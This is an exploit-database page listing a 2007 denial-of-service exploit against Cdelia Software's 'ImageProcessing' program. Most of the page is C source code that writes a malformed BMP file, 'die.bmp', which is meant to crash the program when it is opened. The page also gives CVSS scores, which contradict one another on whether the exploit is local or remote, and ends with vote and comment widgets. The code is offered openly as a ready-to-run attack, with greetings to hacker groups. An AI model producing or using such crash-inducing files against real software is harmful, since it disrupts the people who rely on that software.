ImageProcessing ... Local (Denial of Service Exploit)

2007.05.12
Credit: Dr Ninux
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* ********************************** ## Exploit Coded By Dr.Ninux ## ## www.LeZr.com ## ## LeZr.com Security Team ## ## Dr.Ninux (at) bsdmail (dot) org [email concealed] ## ********************************** ## 24 April 2007 , Tuesday ## This exploit will create an image (bmp) ## try to open it with "ImageProcessing" from Cdelia Software co. ## then the program will be die...! ********************************** ## ## grEEts to: ## Dr.Virus9,Qptan(Linux_Drox),Q8trojan,BataWeel,SAUDI,RoDhEDoR, ## Arab4services.com,The_DoN,aseer-alnjoom,Maxy,hacaar...AND milw0rm.com ## */ #include <stdio.h> #include <stdlib.h> #define INV_PIC "die.bmp" int main() { int i=0; char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL"; FILE* inv_pic; printf("\t\t**********************************\n"); printf("\t\t ## Exploit Coded By Dr.Ninux ##\n"); printf("\t\t ## www.LeZr.com ##\n"); printf("\t\t ## LeZr.com Security Team ##\n"); printf("\t\t ## Dr.Ninux (at) bsdmail (dot) org [email concealed] ##\n"); printf("\t\t**********************************\n"); printf("\n"); if((inv_pic=fopen(INV_PIC,"wb"))==NULL) { printf("error:foepn().\n"); exit(0); } printf("[+]Creating |invalid picture| ... plz wait.\n"); for(i=0;i<sizeof(inv_);i++) { fputc(inv_[i],inv_pic); } fclose(inv_pic); printf("[+]BMP File %s Successfuly Created...\n",INV_PIC); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top